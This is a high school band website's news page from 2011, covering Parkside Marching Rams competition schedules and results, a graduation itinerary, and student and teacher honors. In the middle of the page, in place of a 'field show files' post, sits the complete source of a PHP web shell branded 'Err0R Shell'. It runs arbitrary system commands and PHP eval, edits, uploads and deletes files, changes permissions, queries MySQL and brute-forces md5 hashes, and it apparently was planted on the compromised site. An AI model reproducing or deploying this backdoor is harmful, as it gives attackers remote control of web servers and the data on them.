Directory

Parkside Marching Rams Host 2011 Delmarvacade of Bands 10-13-2011

The Parkside Marching Rams will host the 2011 Delmarvacade of Bands on Saturday, October 15th, at Wicomico County Stadium in Salisbury, MD.  The event will begin at 6:30 PM, and the schedule for Delmarvacade includes eleven bands from the region performing their 2011 field shows in Tournament of Bands competition.  Admission to the event is $5 at the gate.  Programs for the competition, which include the show schedule and descriptions of each band's show, will be available for $5.  One dollar of the program purchase price will be donated to Women Supporting Women, and the purchase of a program also includes a limited edition button to show that our bands are 'Marching for a Cause' to recognize National Breast Cancer Awareness Month.  All Tournament of Bands competitions are open to the public, and the Parkside Marching Rams invite all local residents to attend the event for an opportunity to experience the outstanding talents of these dedicated students.

Delmarvacade Schedule

Group 1 A
6:30  Laurel
Group 1 Open
6:44  Queen Anne's
6:58  Chesapeake
Group 2 Open
7:12  Calvert
7:26  Patuxent
7:40  Wicomico
7:54  Huntingtown
Group 3 Open
8:08  Meade
8:22  Caesar Rodney
8:36  James M. Bennett
Group 3 Open (Exhibition)
8:50  Parkside
9:25 Awards Ceremony


Marching Rams Continue Success at William Penn TOB 10-13-2011

The Parkside Marching Rams traveled to the William Penn TOB in Wilmington, DE, on Saturday, October 8th, where they earned first place in Group 3 Open with a score of 86.50.  The Marching Rams also earned the special awards for High Auxiliary and High Percussion.  Parkside finished the weekend tied for 5th overall in Tournament of Bands Group 3 Open.


Marching Rams Stake Their Claim to First Place 10-13-2011

The Parkside Marching Rams debuted their 2011 field show, Stake Your Claim, at the 2011 Appoquinimink TOB on October 1st, 2011, in Middletown, DE. Parkside finished 1st in Group 3 Open with a score of 82.30. Parkside High School, located in Salisbury, MD, competes in Tournament of Bands Chapter IX. The Parkside Marching Rams are directed by Mr. Kevin Zaczkiewicz, and designer for the 2011 field show is Mr. Mike Ashmead.


Marching Rams will NOT perform at tonight's Homecoming game! 09-23-2011

Due to inclement weather the Parkside Marching Rams will NOT perform at tonight's Homecoming game!


2011 Field Show files available in the Members area. 06-07-2011

<br><?php
@include"config.php";
error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename(__FILE__);
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }
 if($_POST['pass'] == $password)
 {
   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
 }
 reload();
}
 
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
 chdir($_GET['dir']);
}

$pages = array(
 'cmd' => 'Execute Command',
 'eval' => 'Evaluate PHP',
 'mysql' => 'MySQL Query',
 'chmod' => 'Chmod File',
 'phpinfo' => 'PHPinfo',
 'md5' => 'md5 cracker',
 'headers' => 'Show headers',
 'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' Err0R Shell - a5q@hot</title>
<head>
<style>
td {
 font-size: 12px;
 font-family: verdana;
 color: #828485;
 background: #000000;
}
#d {
 background: #343634;
}
#f {
 background: #000000;
}
#s {
 background: #484948;
}
#d:hover
{
 background: #000000;
}
#f:hover
{
 background: #343634;
}
pre {
 font-size: 10px;
 font-family: verdana;
 color: #828485;
}
a:hover {
text-decoration: none;
}

input,textarea,select {
 border-top-width: 1px;
 font-weight: bold;
 border-left-width: 1px;
 font-size: 10px;
 border-left-color: #828485;
 background: #000000;
 border-bottom-width: 1px;
 border-bottom-color: #828485;
 color: #828485;
 border-top-color: #828485;
 font-family: verdana;
 border-right-width: 1px;
 border-right-color: #828485;
}
hr {
color: #828485;
background-color: #828485;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="a5q@hotmail.com">Err0R</a>]  [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.alm7ben.com">I?IOE</a> & <a href="a5q@hotmail.com">a5q@hotmail.com</a></center></td></table></body></head></html>';

//
//Page handling
//
if(isset($_REQUEST['p']))
{
  switch ($_REQUEST['p']) {
   
   case 'cmd': //Run command
    
    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
     if(isset($_REQUEST['command']))
     {
      print "<pre>";
      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
     }
   break;
   
   
   case 'edit': //Edit a fie
    if(isset($_POST['editform']))
    {
     $f = $_GET['file'];
     $fh = fopen($f, 'w') or print "Error while opening file!";
     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
     fclose($fh);
    }
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
    
    if(file_exists($_GET['file']))
    {
     $rd = file($_GET['file']);
     foreach($rd as $l)
     {
      print htmlspecialchars($l);
     }
    }
    
    print "</textarea><input type=submit value=\"Save\"></form>";
    
   break;
   
   case 'delete': //Delete a file
   
    if(isset($_POST['yes']))
    {
     if(unlink($_GET['file']))
     {
      print "File deleted successfully.";
     }
     else
     {
      print "Couldn't delete file.";
     }
    }
    
    
    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
    {
     print "Are you sure you want to delete ".$_GET['file']."?<br>
     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
     <input type=hidden name=yes value=yes>
     <input type=submit value=\"Delete\">
     ";
    }
   
   
   break;
   
   
   case 'eval': //Evaluate PHP code
   
    print "<form action=\"".$me."?p=eval\" method=POST>
    <textarea cols=60 rows=10 name=\"eval\">";
    if(isset($_POST['eval']))
    {
     print htmlspecialchars($_POST['eval']);
    }
    else
    {
     print "print \"Yo Momma\";";
    }
    print "</textarea><br>
    <input type=submit value=\"Eval\">
    </form>";
    
    if(isset($_POST['eval']))
    {
     print "<h1>Output:</h1>";
     print "<br>";
     eval($_POST['eval']);
    }
   
   break;
   
   case 'chmod': //Chmod file
    
    
    print "<h1>Under construction!</h1>";
    if(isset($_POST['chmod']))
    {
    switch ($_POST['chvalue']){
     case 777:
     chmod($_POST['chmod'],0777);
     break;
     case 644:
     chmod($_POST['chmod'],0644);
     break;
     case 755:
     chmod($_POST['chmod'],0755);
     break;
    }
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
    }
    if(isset($_GET['file']))
    {
     $content = urldecode($_GET['file']);
    }
    else
    {
     $content = "file/path/please";
    }
    
    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
    <select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";
    
   break;
   
   case 'mysql': //MySQL Query
   
   if(isset($_POST['host']))
   {
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
    mysql_select_db($_POST['dbase']);
    $sql = $_POST['query'];
    
    
    $result = mysql_query($sql);
    
   }
   else
   {
    print "
    This only queries the database, doesn't return data!<br>
    <form action=\"".$me."?p=mysql\" method=POST>
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
    
    <b>Query:<br></b<textarea name=query></textarea>
    <input type=submit value=\"Query database\">
    </form>
    ";
    
   }
   
   break;
   
   case 'createdir':
   if(mkdir($_GET['crdir']))
   {
   print 'Directory created successfully.';
   }
   else
   {
   print 'Couldn\'t create directory';
   }
   break;
   
   
   case 'phpinfo': //PHP Info
    phpinfo();
   break;
   
   
   case 'rename':
   
    if(isset($_POST['fileold']))
    {
     if(rename($_POST['fileold'],$_POST['filenew']))
     {
      print "File renamed.";
     }
     else
     {
      print "Couldn't rename file.";
     }
     
    }
    if(isset($_GET['file']))
    {
     $file = basename(htmlspecialchars($_GET['file']));
    }
    else
    {
     $file = "";
    }
    
    print "Renaming ".$file." in folder ".realpath('.').".<br>
        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
     <input type=submit value=\"Rename file\">
     </form>";
   break;
   
   case 'md5':
   if(isset($_POST['md5']))
   {
   if(!is_numeric($_POST['timelimit']))
   {
   $_POST['timelimit'] = 30;
   }
   set_time_limit($_POST['timelimit']);
    if(strlen($_POST['md5']) == 32)
    {
     
      if($_POST['chars'] == "9999")
      {
      $i = 0;
      while($_POST['md5'] != md5($i) && $i != 100000)
       {
        $i++;
       }
      }
      else
      {
       for($i = "a"; $i != "zzzzz"; $i++)
       {
        if(md5($i == $_POST['md5']))
        {
         break;
        }
       }
      }
     
     if(md5($i) == $_POST['md5'])
     {
       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
     }
     
    }
    
   }
   
   print "Will bruteforce the md5
    <form action=\"".$me."?p=md5\" method=POST>
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
    <b>Characters:</b><br><select name=\"chars\">
    <option value=\"az\">a - zzzzz</option>
    <option value=\"9999\">1 - 9999999</option>
    </select>
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
    <input type=submit value=\"Bruteforce md5\">
    </form><br>*: if set_time_limit is allowed by php.ini";
   break;
   
   case 'headers':
   foreach(getallheaders() as $header => $value)
   {
   print htmlspecialchars($header . ":" . $value)."<br>";
   
   }
   break;
  }
}
else //Default page that will be shown when the page isn't found or no page is selected.
{
 
 $files = array();
 $directories = array();
 
 if(isset($_FILES['uploadedfile']['name']))
{
 $target_path = realpath('.').'/';
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
     print "File:".  basename( $_FILES['uploadedfile']['name']).
     " has been uploaded";
 } else{
     echo "File upload failed!";
 }
}

 
 
 
 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
 if ($handle = opendir('.'))
 {
  while (false !== ($file = readdir($handle)))
  {
        if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
  foreach($directories as $file)
  {
   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 
  foreach($files as $file)
  {
   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 }
 else
 {
  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
 }
 
 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";

}

function login()
{
 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
 <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
 </form>";
}
function reload()
{
 header("Location: ".basename(__FILE__));
}
function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }
 
 elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }
 
 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }
 
 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}
 
}
function show_dirs($where)
{
 if(ereg("^c:",realpath($where)))
 {
 $dirparts = explode('\\',realpath($where));
 }
 else
 {
 $dirparts = explode('/',realpath($where));
 }
 
 
 
 $i = 0;
 $total = "";
 
 foreach($dirparts as $part)
 {
  $p = 0;
  $pre = "";
  while($p != $i)
  {
   $pre .= $dirparts[$p]."/";
   $p++;
   
  }
  $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  $i++;
 }
 
 return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>
 


Parkside Graduation Final Itinerary and Information 06-02-2011

PARKSIDE HIGH SCHOOL BANDS
Kevin Zaczkiewicz, Director
Phone: (410) 677-5161
1015 Beaglin Park Drive Fax: (410) 677-5104
Salisbury, Maryland 21804 e-mail: kzaczkie@wcboe.org
June 3rd, 2011
Parkside Graduation
Final Itinerary and Information
MORNING REHEARSAL
- TRAILER AVAILABLE FOR PICK UP: 7:15a.m.
- PERCUSSION LOAD TRUCK 7:25a.m. -7:50a.m.
- LOAD BUSSES: 8:00 a.m.
- DEPART P.H.S. 8:05 a.m.
- ARRIVE AT CIVIC CENTER 8:10 p.m.
-Graduation rehearsal
- RETURN TO PARKSIDE HIGH SCHOOL ~11:00 a.m.
GRADUATION CEREMONY
- DOWNBEAT 6:15 p.m.
o Be in full concert uniform in seat ready to play at 6:15 p.m.
o You will need to find your own transportation to/from Civic Center.
- GRADUATION ENDS ~9:00 p.m.
- LOAD TRUCK ~9:15 p.m.
- EQUIPMENT TRUCK UNLOADING AT PARKSIDE: Approximately 9:30 p.m.
(EVERYONE)
_______________________________________________________________________________________________________________
IMPORTANT REMINDERS
- On the morning of Graduation, students should check in with their 1st period teachers and report to the Band room
IMMEDIATELY. Please move fast.
-Unfortunately, due to the large volume of Graduates/Families, Band parents are not provided tickets to this performance.
-Please be sure to eat a light dinner before arrival at the Civic Center.
- Graduation ends at around 9:00. Parents are asked to please be patient as our arrival back at Parkside could be slightly
delayed depending on the length of the ceremony.


Zaczkiewicz Honored by Maryland Music Educators Association 03-11-2011

Those of us who have been lucky enough to be a part of Parkside Bands over all or part of the last four years are well aware of the level of talent and enthusiasm that Director Kevin Zaczkiewicz has brought to our school.  Mr. Zaczkeiwicz is providing a level of music education that is rare at the high school level in any district across the state.  After leading the Parkside Symphonic Band in an ESBDA District Festival performance which produced straight 1 Superior ratings and was considered by many the best of the day, Mr. Zaczkiewicz is on his way to being honored by the Maryland Music Educators Association.  Mr. Gary Beauchamp, Wicomico County Supervisor of Music/Visual Art, had the pleasure of reporting to all Board of Ed staff members that Kevin Zaczkiewicz will be recognized as the Outstanding New Music Teacher in the State of Maryland for the year 2011.  Please enjoy the message below as sent by Mr. Beauchamp and join us in congratulating our Band Director for this honor.

Dear All,
 
Congratulations to Kevin Zaczkiewicz, Band Director at Parkside High School and Visual and Performing Arts Instructor at Wicomico High School!!!!!
 
I have just received official notice of Kevin being selected as the Maryland Music Educators Association's Outstanding New Music Teacher in the State Of Maryland for the year 2011! Kevin will be honored at a luncheon on Saturday, April 9th, 2011 at the Turf Valley Resort and Convention Center in Ellicott City, Maryland. Kevin received this award out of all the music teachers in the Maryland who have 5 years or less employed by a school district in State of Maryland.
 
Thank you Kevin for all that you do and have done for the students in Wicomico County. This award is very much deserved!
 
Gary Beauchamp
 
Gary A. Beauchamp
Supervisor of Music/Visual Art and Special Projects
Wicomico County Public Schools
101 Long Avenue
P. O. Box 1538
Salisbury, Maryland 21802-1538
(410)677-4573 Office
(410)677-4418 Fax
gabeauch@wcboe.org


Parkside Bands to Perform at District Festival 03-08-2011

Parkside Intermediate and Symphonic Bands will perform at the ESBDA District Festival on Wednesday, March 9th.  Intermediate Band will perform at 9:30 AM, and Symphonic Band will perform at 3:30 PM.  All performances will take place in the Wicomico High School Auditorium. 


2010 District Festival Itinerary


Parkside Band Students Excel at Solo and Ensemble Festival 03-08-2011

Congratulations to the following Parkside students for earning Superior (I) ratings at the ESBDA District Solo and Ensemble Festival.  A "superior" rating on a graded selection qualifies each of these students for State Festival.  FYI - Grade VI is the most difficult music on the list, Grade I is the least difficult.
 
Erick Miranda - Alto Saxophone (Grade VI)
Jordan Pantalone - Vibraphone (Grade VI)
Sarah Shockley - Clarinet (Grade V)
Sarah Ha - Flute (Grade IV)
Sarah Shockley and Emily Harris - Woodwind Duet (Grade IV)
Emily Harris and Abby Keen - Flute Duet (Grade IV)
Tiffany Biles - Trumpet (Grade IV)
Daniel McIntyre - Piano (Festival)
Emily Harris - Flute (Grade III)
William Johnson - Marimba (Grade III)
Jennifer Ritchie and Abby Keen - Flute Duet (Grade III)
 
The following students received Excellent (II) ratings at the festival.
 
Neve McClymont/Chan Park - Flute Duet (Festival)
Neve McClymont - Flute (Grade IV)
 
Thank you,
 
Kevin A. Zaczkiewicz
Director of Bands, Parkside High School
1015 Beaglin Park Drive
Salisbury, Maryland 21804
Office: 410.677.5161
Fax: 410.677.5104
kzaczkie@wcboe.org
Web: www.parksidebands.org


Parkside Band Members Earn All Shore Honors 03-08-2011

Congratulations to the following Parkside students for qualifying for the 2011 All-Shore Band!  These students worked very hard preparing their auditions and should be commended for their work.  All Shore weekend is April 1st and 2nd culminating with a concert at Easton High School on the 2nd. 
 
Emily Harris - 2nd chair Flute
Neve McClymont - 5th chair Flute
Sarah Ha - 6th chair Flute
Hannah Shockley - 1st chair Oboe
Sarah Shockley - 4th chair Clarinet
Kathryn Bryant - 6th chair Clarinet
Kayla Judd - 16th chair Clarinet
Molly Stephens - 20th chair Clarinet
Sarah Skolka - 2nd chair Bass Clarinet
Erick Miranda - 1st chair Alto Sax
Tiffany Biles - 10th chair Trumpet
Mardelle Davis - 1st chair Horn
Zack Goodman - 2nd chair Trombone
Harry Mowery - 1st chair Tuba
 
Thanks!
 
Kevin A. Zaczkiewicz
Director of Bands, Parkside High School
1015 Beaglin Park Drive
Salisbury, Maryland 21804
Office: 410.677.5161


Next Last
 
No portion of this site may be reproduced without the express written consent of the Parkside High School Bands.
The contents of this site copyright ©2007 Parkside High School Bands.